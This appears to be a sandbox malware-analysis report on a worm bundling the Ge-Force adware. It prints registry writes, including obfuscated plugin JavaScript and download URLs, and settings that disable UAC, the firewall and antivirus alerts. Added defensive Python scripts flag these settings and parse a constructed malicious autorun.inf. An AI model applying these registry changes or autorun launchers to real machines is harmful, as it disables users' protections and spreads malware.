"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'ywpwzqylqz'); }"
[HKCU\Software\Ge-Force\Plugins\200]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\Ge-Force\Plugins\4]
"Version" = "5"
[HKCU\Software\Ge-Force\Manifest]
"Manifest" = "NA"
[HKCU\Software\Ge-Force\Update]
"LastCheck" = "1421039414"
[HKCU\Software\Ge-Force\Plugins\123]
"Name" = "intext_adv_m"
[HKLM\SOFTWARE\Ge-Force\IE]
"TotalProfiles" = "1"
[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"
[HKCU\Software\Ge-Force\Plugins\182]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/182.js"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 1E DD DC A6 3D CB 28 91 69 85 29 DA 0B A4 28"
[HKCU\Software\Ge-Force\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\Ge-Force\Plugins\1]
"Name" = "base"
[HKCU\Software\Ge-Force\Plugins\102]
"Version" = "11"
[HKCU\Software\Ge-Force\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n"
[HKCU\Software\Ge-Force\Plugins\91]
"JavaScript" = "(function(M){var A=[].slice;var z={};var a=function(ar){if(typeof ar==string&&typeof ar.trim==function){return ar.trim();}return ar==null?:ar.toString().replace(/^\s /,).replace(/\s $/,);};function f(ar){var at=z[ar]={},au,av;ar=ar.split(/\s /);for(au=0,av=ar.length;au
[HKCU\Software\Ge-Force\Plugins\102]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/102.js"
[HKCU\Software\Ge-Force\Plugins\221]
"Version" = "4"
[HKCU\Software\Ge-Force\Installer]
"CodeDownloadDomain" = "http://js.newstatsclientcloud.com"
[HKCU\Software\Ge-Force\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"
[HKCU\Software\Ge-Force\Manifest]
"Description" = "Ge-Force"
[HKCU\Software\Ge-Force\Plugins\262]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\7]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/7.js"
[HKCU\Software\Ge-Force\Plugins\45]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKCU\Software\Ge-Force\Plugins\64]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/64.js"
[HKCU\Software\Ge-Force\Plugins\22]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/22.js"
[HKCU\Software\Ge-Force\Plugins\123]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'vwfblxmddx'); }"
[HKCU\Software\Ge-Force\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi)"
[HKCU\Software\Ge-Force\Plugins\253]
"Name" = "pixel_inject"
[HKCU\Software\Ge-Force\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\Ge-Force\Plugins\354]
"Name" = "categories"
[HKCU\Software\Ge-Force\Plugins\220]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/220.js"
[HKCU\Software\Ge-Force\Plugins\345]
"Name" = "pluginsVerticals"
[HKCU\Software\Ge-Force\Plugins\91]
"Name" = "monetizationLoader.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"Publisher" = "iWebar"
[HKCU\Software\Ge-Force\Plugins\9]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/9.js"
[HKCU\Software\Ge-Force\Plugins\2]
"Name" = "ie8_fix_1"
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/2.js"
[HKCU\Software\Ge-Force\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO"
[HKCU\Software\Ge-Force\Plugins\42]
"Version" = "10"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Ge-Force\Plugins\350]
"Version" = "1"
[HKCU\Software\Ge-Force\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:[""\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x73\x6f""
[HKCU\Software\Ge-Force\Plugins\220]
"Name" = "icm_base_m"
[HKCU\Software\Ge-Force\Plugins\242]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/242.js"
[HKCU\Software\Ge-Force\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\Ge-Force\Plugins\123]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/123.js"
[HKCU\Software\Ge-Force\Plugins\184]
"Version" = "10"
[HKCU\Software\Ge-Force\Plugins\4]
"Name" = "jquery_1_7_1"
[HKCU\Software\Ge-Force\Plugins\195]
"Name" = "icm_convertmedia_m"
[HKCU\Software\Ge-Force\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'ymqrbrldpj'); }"
[HKCU\Software\Ge-Force\Manifest]
"SetNewTab" = "false"
[HKCU\Software\Ge-Force\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){e"
[HKCU\Software\Ge-Force\Manifest]
"ThanksUrl" = "NA"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"AppPath" = "%Program Files%\Ge-Force"
The Worm modifies IE security-zone settings so that sites which bypass the proxy server are treated as part of the Local intranet zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Worm modifies IE security-zone settings so that all local (intranet) sites not listed in other zones are treated as part of the Local intranet zone:
"IntranetName" = "1"
The Worm modifies IE security-zone settings so that all network (UNC) paths are treated as part of the Local intranet zone:
"UNCAsIntranet" = "1"
Content loaded from the Local intranet zone runs under weaker restrictions than Internet-zone content.
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm deletes the following registry key(s):
[HKCU\Software\Ge-Force\Plugins\301]
[HKCU\Software\Ge-Force\Plugins\263]
[HKCU\Software\Ge-Force\Plugins\242]
[HKCU\Software\Ge-Force\Plugins\184]
[HKCU\Software\Ge-Force\Plugins\183]
[HKCU\Software\Ge-Force\Plugins\182]
[HKCU\Software\Ge-Force\Plugins\246]
[HKCU\Software\Ge-Force\Plugins\180]
[HKCU\Software\Ge-Force\Plugins\104]
[HKCU\Software\Ge-Force\Plugins\2]
[HKCU\Software\Ge-Force\Plugins\223]
[HKCU\Software\Ge-Force\Plugins\220]
[HKCU\Software\Ge-Force\Plugins\207]
[HKCU\Software\Ge-Force\Plugins\200]
[HKCU\Software\Ge-Force\Plugins\93]
[HKCU\Software\Ge-Force\Plugins\91]
[HKCU\Software\Ge-Force\Plugins\94]
[HKCU\Software\Ge-Force\Plugins\221]
[HKCU\Software\Ge-Force\Plugins\177]
[HKCU\Software\Ge-Force\Plugins\345]
[HKCU\Software\Ge-Force\Plugins\72]
[HKCU\Software\Ge-Force\Plugins\17]
[HKCU\Software\Ge-Force\Plugins\14]
[HKCU\Software\Ge-Force\Plugins\38]
[HKCU\Software\Ge-Force\Plugins\13]
[HKCU\Software\Ge-Force\Plugins\78]
[HKCU\Software\Ge-Force\Plugins\35]
[HKCU\Software\Ge-Force\Plugins\36]
[HKCU\Software\Ge-Force\Plugins\37]
[HKCU\Software\Ge-Force\Plugins\43]
[HKCU\Software\Ge-Force\Plugins\39]
[HKCU\Software\Ge-Force\Plugins\64]
[HKCU\Software\Ge-Force\Plugins\273]
[HKCU\Software\Ge-Force\Plugins\41]
[HKCU\Software\Ge-Force\Plugins\40]
[HKCU\Software\Ge-Force\Plugins\192]
[HKCU\Software\Ge-Force\Plugins\42]
[HKCU\Software\Ge-Force\Plugins\253]
[HKCU\Software\Ge-Force\Plugins\195]
[HKCU\Software\Ge-Force\Plugins\47]
[HKCU\Software\Ge-Force\Plugins\44]
[HKCU\Software\Ge-Force\Plugins]
[HKCU\Software\Ge-Force\Plugins\46]
[HKCU\Software\Ge-Force\Plugins\354]
[HKLM\SOFTWARE\Tempo]
[HKCU\Software\Ge-Force\Plugins\286]
[HKCU\Software\Ge-Force\Plugins\281]
[HKCU\Software\Ge-Force\Plugins\4]
[HKCU\Software\Ge-Force\Plugins\7]
[HKCU\Software\Ge-Force\Plugins\9]
[HKCU\Software\Ge-Force\Plugins\1]
[HKCU\Software\Ge-Force\Plugins\123]
[HKCU\Software\Ge-Force\Plugins\3]
[HKCU\Software\Ge-Force\Plugins\28]
[HKCU\Software\Ge-Force\Plugins\22]
[HKCU\Software\Ge-Force\Plugins\21]
[HKCU\Software\Ge-Force\Plugins\45]
[HKCU\Software\Ge-Force\Plugins\102]
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1616 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"
[HKCU\Software\Aas]
"a1_0" = "2892445252"
[HKCU\Software\Aas\695404737]
"35845605" = "476"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Aas\695404737]
"50183847" = "83AD022F944CCF21DDECD41871254667172BA39F3E949513F4CC29B07060AC534912E5BCB155880C2C4326E6FB83E6FA099D4219F6885291D527824C5507229614A07CE2AF035D97263FF7F26AD2ACC9D5D4395D4B8B3109DC5C0C87B31A1505E6E94E08EF20E71B91B96D3856F531DADFD78A894AD6A6C177136C5657B01661"
[HKCU\Software\Aas]
"a3_0" = "17001001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKCU\Software\Aas\695404737]
"14338242" = "0"
"7169121" = "144"
"21507363" = "0"
"28676484" = "35"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 11 4A 0A 6F 3A B0 B9 41 F5 E0 2F F6 BF 6A BE"
[HKCU\Software\Aas]
"a2_0" = "7005"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Aas]
"a4_0" = "0"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"
Adds a Windows Firewall exception that allows the file any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"
Firewall notifications are disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"
The Windows Firewall is disabled for the standard profile:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
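The registry changes listed above (UAC switched off, Security Center overrides, the Windows Firewall disabled and a blanket exception added, and the IE zone map loosened) are the settings a responder checks first on a suspect host. The following triage script is an added example; it is not part of the Lavasoft report and not Ad-Aware tooling. It assumes a listing in the `[key]` / `"name" = "value"` form used throughout this report (an exported .reg file flattened the same way would also work), and its rule set covers only values that appear in this report. The embedded listing is constructed from those values; `sample.exe` is a placeholder for the dropper's name.

```python
"""Flag security-weakening registry values in a sandbox-style registry listing.

Added example, not part of the original report. Assumed input format:
    [HKLM\\...\\Key]
    "ValueName" = "data"
The rule set is limited to values seen in this report.
"""
import re
from dataclasses import dataclass

KEY_RE = re.compile(r'^\[(HK[^\]]+)\]$')
VALUE_RE = re.compile(r'^"([^"]+)"\s*=\s*"(.*)"$')

# Key paths are compared lowercased so HKLM\System and HKLM\SYSTEM both match.
SC = r"hklm\software\microsoft\security center"
FW = (r"hklm\system\currentcontrolset\services\sharedaccess\parameters"
      r"\firewallpolicy\standardprofile")
ZONEMAP = r"hkcu\software\microsoft\windows\currentversion\internet settings\zonemap"
POLICY = r"hklm\software\microsoft\windows\currentversion\policies\system"
EXPLORER = r"hkcu\software\microsoft\windows\currentversion\explorer\advanced"

# (key, value name, data) -> what the setting does to the host
EXACT_RULES = {
    (POLICY, "enablelua", "0"): "UAC disabled",
    (FW, "enablefirewall", "0"): "Windows Firewall disabled (standard profile)",
    (FW, "disablenotifications", "1"): "Windows Firewall notifications suppressed",
    (FW, "donotallowexceptions", "0"): "firewall exceptions allowed (needed for an AuthorizedApplications entry)",
    (ZONEMAP, "uncasintranet", "1"): "UNC paths mapped to the Local intranet zone",
    (ZONEMAP, "proxybypass", "1"): "sites that bypass the proxy mapped to the Local intranet zone",
    (ZONEMAP, "intranetname", "1"): "unlisted local sites mapped to the Local intranet zone",
    (EXPLORER, "hidden", "2"): "Explorer set to hide hidden files",
}


@dataclass(frozen=True)
class Finding:
    key: str
    name: str
    data: str
    note: str


def parse_registry_listing(text):
    """Return {(key, name): data} with key and name lowercased.
    Prose lines and table rows between the registry lines are ignored;
    a value line with no preceding key header is dropped."""
    settings, current_key = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current_key = m.group(1).lower()
            continue
        m = VALUE_RE.match(line)
        if m and current_key is not None:
            settings[(current_key, m.group(1).lower())] = m.group(2)
    return settings


def find_security_downgrades(settings):
    """Apply the exact-match rules plus two pattern rules: any Security Center
    (or Security Center\\Svc) *Override / *DisableNotify value set to 1, and any
    firewall AuthorizedApplications entry of the form path:*:Enabled:name."""
    findings = []
    for (key, name), data in settings.items():
        note = EXACT_RULES.get((key, name, data))
        if note:
            findings.append(Finding(key, name, data, note))
        elif (key in (SC, SC + r"\svc") and data == "1"
              and (name.endswith("override") or name.endswith("disablenotify"))):
            findings.append(Finding(key, name, data, "Security Center monitoring or alerting switched off"))
        elif key.startswith(FW + r"\authorizedapplications\list") and ":*:enabled:" in data.lower():
            findings.append(Finding(key, name, data, "firewall exception allowing the program all traffic"))
    return findings


def triage(text):
    return find_security_downgrades(parse_registry_listing(text))


# Constructed listing using values from this report; "sample.exe" is a placeholder.
SAMPLE_LISTING = r"""
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
"EnableFirewall" = "0"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"sample.exe" = "c:\sample.exe:*:Enabled:ipsec"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LISTING):
        print(f"{f.note}: [{f.key}] {f.name} = {f.data}")
```

The NGen counter in the constructed listing is deliberately left unflagged: `mscorsvw.exe` writing `AccumulatedWaitIdleTime` is ordinary .NET service housekeeping that the sandbox attributed to the worm's process tree, and a rule set that flagged it would bury the real findings.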
The process mscorsvw.exe:172 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"
The process Ge-Force-bg.exe:2632 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 47 B3 F2 5A 84 9B 30 E9 C3 A5 17 05 08 53 FC"
Dropped PE files
MD5 | File path |
---|---|
0fb8fdff654dea1444a1733cfb79149d | c:\Program Files\Ge-Force\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.exe |
e19b738b235ea40fc075f8627c5472b9 | c:\Program Files\Ge-Force\Ge-Force-bg.exe |
11ccef28d3bfd871ab173a7e03f57b04 | c:\Program Files\Ge-Force\Ge-Force-bho.dll |
303913dad1bffa0af8c207f29489f336 | c:\Program Files\Ge-Force\Ge-Force-buttonutil.dll |
ce4ccca778189fef1de87a66f21ac3e1 | c:\Program Files\Ge-Force\Ge-Force-buttonutil.exe |
26461d0b7a6729c1263bc94a65753246 | c:\Program Files\Ge-Force\Ge-Force-codedownloader.exe |
e63daa30be43031462b6a86267431b9c | c:\Program Files\Ge-Force\Uninstall.exe |
5981f7b76df711e10c552db4ca62ab0a | c:\Program Files\Ge-Force\utils.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.
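The autorun.inf the worm leaves on each removable drive is itself a useful artifact for triage. The script below is an added example; it is not Lavasoft code and was not recovered from this sample. It parses the `[autorun]` section tolerantly (junk lines, comments, binary padding), lists every command the Windows shell would run from the file (`open=`, `shellexecute=`, and `shell\<verb>\command=`, the last of which hijacks Explorer's context-menu verbs), and flags files whose launch keys point at an executable. Both embedded autorun.inf files are constructed, and `RECYCLER\setup.exe` is a placeholder path, not a name this worm is documented to use. Note that the sandbox ran Windows XP SP3; since Microsoft's 2011 AutoRun restriction update, removable drives no longer honour these keys by default, so on a patched host the file is an indicator of infection rather than an execution vector.

```python
"""Static triage of an autorun.inf taken from a removable drive.

Added example, not part of the original report. Assumes the documented
[autorun] keys (open, shellexecute, shell\\<verb>\\command); samples are constructed.
"""
import re

SECTION_RE = re.compile(r'^\s*\[([^\]]+)\]\s*$')
PAIR_RE = re.compile(r'^\s*([^=;\s][^=]*?)\s*=\s*(.*?)\s*$')
# Extensions the shell would execute directly when named as a launch target
EXEC_EXT = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js", ".wsf")
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun_inf(raw):
    """Return {key_lower: value} for the [autorun] section only.
    Accepts bytes (decoded as cp1252 so binary padding does not abort the
    parse) or str; comment lines (';') and lines without '=' are skipped."""
    text = raw.decode("cp1252", errors="replace") if isinstance(raw, bytes) else raw
    entries, in_autorun = {}, False
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            in_autorun = m.group(1).strip().lower() == "autorun"
            continue
        if not in_autorun or line.lstrip().startswith(";"):
            continue
        m = PAIR_RE.match(line)
        if m:
            entries[m.group(1).lower()] = m.group(2)
    return entries


def launch_targets(entries):
    """Every command line the shell would run from this file, in file order."""
    targets = []
    for key, value in entries.items():
        hijacked_verb = key.startswith("shell\\") and key.endswith("\\command")
        if (key in LAUNCH_KEYS or hijacked_verb) and value:
            targets.append(value)
    return targets


def _command_head(cmd):
    """First token of a command line with surrounding quotes removed."""
    parts = cmd.strip().strip('"').lower().split()
    return parts[0].rstrip('"') if parts else ""


def is_suspicious(entries):
    """True if any launch target names an executable or script, or if the
    default verb (shell=) is redirected to a custom command."""
    if any(_command_head(t).endswith(EXEC_EXT) for t in launch_targets(entries)):
        return True
    default_verb = entries.get("shell", "").lower()
    return bool(default_verb) and f"shell\\{default_verb}\\command" in entries


# Constructed samples; RECYCLER\setup.exe is a placeholder path.
MALICIOUS_AUTORUN = rb"""[AutoRun]
;9f3a1c junk comment line
open=RECYCLER\setup.exe
shell\open\command=RECYCLER\setup.exe
shell\explore\command=RECYCLER\setup.exe
shellexecute="RECYCLER\setup.exe" -autorun
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell=open
"""

BENIGN_AUTORUN = rb"""[autorun]
icon=product.ico
label=Vendor Driver CD
"""

if __name__ == "__main__":
    for name, blob in (("malicious", MALICIOUS_AUTORUN), ("benign", BENIGN_AUTORUN)):
        entries = parse_autorun_inf(blob)
        print(name, "suspicious" if is_suspicious(entries) else "clean", launch_targets(entries))
```

The `action=` and `icon=` keys are parsed but never treated as launch targets; worms set them to mimic the "Open folder to view files" entry so the user picks the malicious verb in the AutoPlay dialog, which is why the hijacked `shell\<verb>\command` keys are the ones worth listing.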
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Ge-Force-codedownloader.exe:2504
Ge-Force-codedownloader.exe:2564
regsvr32.exe:2416
Khtmovq.exe:664
%original file name%.exe:1616
mscorsvw.exe:172
Ge-Force-bg.exe:2632
- Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\192.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\184[1].js (25 bytes)
%Program Files%\Ge-Force\utils.exe (86583 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\301.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\1.js (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\281.js (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\91.js (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\104.js (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.dll (35246 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.job (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\123.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\221.js (415 bytes)
%Program Files%\Ge-Force\Ge-Force.ico (15 bytes)
